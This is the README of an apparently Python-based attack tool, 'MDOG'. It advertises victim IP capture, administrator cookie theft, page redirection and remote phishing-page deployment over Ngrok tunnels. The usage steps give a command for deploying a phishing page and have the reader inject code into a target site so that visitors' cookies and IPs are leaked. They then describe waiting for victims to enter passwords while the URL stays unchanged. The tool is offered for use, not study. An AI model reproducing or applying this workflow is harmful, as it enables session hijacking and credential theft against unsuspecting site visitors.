/MDOG_GGB

Primary LanguagePython

Function
Obtain the victim's public IP address(Update logging)
Get administrator cookies(Update logging)
Page Redirection(Update logging)
Host data sharing(Update logging)
DingTalk data sharing
Remote phishing page deployment(Update logging)

usage method

  • View help information

    #python3 MDOG.py -h

图片名称

Advanced attack

  • Cookie theft (There are no cookies here) and remote deployment of phishing pages

1.Target Web

图片名称

2.Fill in parameters for remote deployment phishing page

(Linux will act as the shared data party, and win will act as the shared data party and push the data)

python3 %s -t -rbtcp (Ngrok TCP Tunnel) -rwtcp (Ngrok TCP Tunnel) -rs -wf fs.html -table -button BT -user UA -pass PA

图片名称

3.Inject Code

图片名称

4.When anyone visits this page, the cookies and public IP will be disclosed

Win

图片名称

Linux

图片名称

First, we will get the basic information, and then wait for the victim to enter the account password, because the URL of the other party has not changed, which can greatly improve the probability of successful phishing

图片名称